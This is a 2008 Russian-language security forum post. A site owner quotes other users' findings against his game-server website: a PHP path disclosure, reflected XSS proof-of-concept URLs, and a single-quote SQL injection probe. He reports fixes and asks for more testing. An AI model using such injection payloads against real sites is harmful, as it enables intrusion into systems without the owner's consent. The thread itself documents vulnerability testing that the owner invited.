ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #4  
Старый 21.02.2008, 16:16
TemPsAgro
Новичок
Регистрация: 20.02.2008
Сообщений: 1
Провел на форуме:
8667

Репутация: 0
По умолчанию

Цитата:
Сообщение от Isis  
Раскрытие пути на главной странице:

Код:
Warning: fsockopen(): unable to connect to 213.219.217.252:8085 in /srv/www/vhosts/the-net.ru/subdomains/wow/httpdocs/index.php on line 203

Warning: fclose(): supplied argument is not a valid stream resource in /srv/www/vhosts/the-net.ru/subdomains/wow/httpdocs/index.php on line 204
Уже плюс...
Поправил

Цитата:
Сообщение от BlackCats  
Код:
http://wow.the-net.ru/index.php?id=top_players&order=class&dir=>'><script%20%0a%0d>alert(99)%3B</script>
Код:
http://wow.the-net.ru/index.php?id=top_players&order=>'><script%20%0a%0d>alert(99)%3B</script>&dir=ASC
XSS
Код:
http://wow.the-net.ru/index.php?s1='
когда уберут то раскрытие путей поторое по дэфолту - будет тут + впринципе скуля заюзать не пробывал.ъ
Вроде исправил...

А больше ничего найти не смогли ? Есть подозрение что SQL инъекции имеются (

Старый хост вешается ( перенёс на другой, найти тут
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ